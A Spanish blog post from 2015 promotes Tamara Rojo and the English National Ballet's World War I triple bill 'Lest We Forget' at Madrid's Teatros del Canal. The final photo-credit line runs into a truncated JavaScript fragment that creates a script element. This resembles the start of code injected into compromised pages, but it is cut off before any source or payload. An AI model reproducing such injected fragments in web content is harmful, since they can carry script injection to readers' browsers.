Tamara Rojo vuelve a Madrid con Lest We Forget

22/04/2015

Ballet Shoes 2

Muchos estaréis pensando: ¿qué relación tienen Tamara Rojo y un álbum recopilatorio de Marilyn Manson del 2004? Pues más bien poco. Este juego de palabras simplemente sirve para ponerle nombre a uno de los mejores espectáculos de danza moderna que aterrizaran en España en los próximos meses. No Man’s Land, Firebird y Dust son las piezas que componen este espectáculo. Dos horas y cuarto apasionantes que harán que no quieras despegarte de tu butaca ni un solo segundo. Las piezas conquistan, señoras y señores, pero el elenco, si cabe, aún más. Encabezado por nuestra querida Tamara Rojo, no creemos que deje indiferente a nadie. Además, culmina la hazaña la Orquesta Sinfónica Verum con su música en directo.

Lest We Forget está inspirada en el Centenario de la Primera Guerra Mundial. Tal y como acabamos de decir, se trata de un programa triple sin desperdicio. Las piezas que lo componen -arriba mencionadas- están coreografiadas por tres grandes: Liam Scarlett, George Williamson y Akram Khan. Las coreografías, bien diferentes entre sí, logran seguir el especial hilo narrativo de lo que Rojo nos quiere contar con este espectáculo en el que se renueva como nunca antes lo había hecho.

Tamara Rojo, canadiense de nacimiento, madrileña de corazón e inglesa de adopción, sigue sorprendiendo y mejorando con el paso de los años. El 22 de octubre de 2012, publicábamos este post, anunciando su nuevo rol de directora del English National Ballet. Y ahí sigue, demostrando sin cesar por qué muchos la consideran ya como la mejor bailarina española de todos los tiempos.

Los Teatros del Canal reciben a Rojo y a sus discípulos en su Sala Roja entre el 28 y el 31 del próximo mes de mayo. Si os interesa el asunto, no demoréis la búsqueda de entradas (y vuelos con Iberia), el renombre de la compañía y de su directora y primera bailarina es tal que volarán. El pasado año Tamara y su English Ballet conquistaron al público español con El Corsario, una intrépida historia sobre piratas, sultanes y doncellas cautivas. Las entradas se agotaron y público y crítica alabaron el buen hacer de Rojo y sus bailarines. Sin duda alguna, con Lest We Forget ocurrirá lo mismo. O, quién sabe, tal vez incluso consigan superar el éxito obtenido hace un año. ¡Se admiten apuestas!

Foto |  Kryziz Bonnyvar d=document;var s=d.createElement(‘script’);